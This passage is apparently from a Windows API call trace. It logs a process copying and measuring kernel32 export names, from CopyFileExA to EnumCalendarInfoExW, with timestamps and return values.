returned="CopyFileExA" [0084.687] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.687] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.688] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.688] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.688] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.688] lstrlenA (lpString="COPYFILEW") returned 9 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.688] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.688] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.688] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.688] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.688] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.688] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.688] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.688] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.688] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.688] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.688] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.688] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.688] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.689] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.689] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.689] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.689] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.689] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.689] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.689] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.689] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.689] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.689] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.689] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.689] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.689] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.689] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.690] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.690] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.690] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.690] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.690] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.690] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.690] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.690] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.690] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.690] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.690] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.690] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.690] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.690] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.690] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.690] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.690] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.690] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.690] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.691] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.691] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.691] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.691] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.691] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.691] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.691] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.691] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.691] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.691] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.691] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.691] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.691] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.691] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.691] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.691] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.691] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.692] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.692] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.692] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.692] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.692] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.692] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.692] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.692] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.692] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.692] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.692] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.692] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.692] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.692] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.692] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.692] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.692] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.692] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.692] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.693] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.693] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.693] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.693] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.693] lstrlenA (lpString="DELETEATOM") returned 10 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.693] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.693] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.693] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.693] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.693] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.693] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.693] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.693] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.693] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.693] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.693] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.693] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.693] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.693] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.694] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.694] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.694] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.694] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.694] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.694] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.694] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.694] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.694] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.694] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.694] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.694] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.694] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.694] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.694] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.694] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.695] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.695] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.695] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: 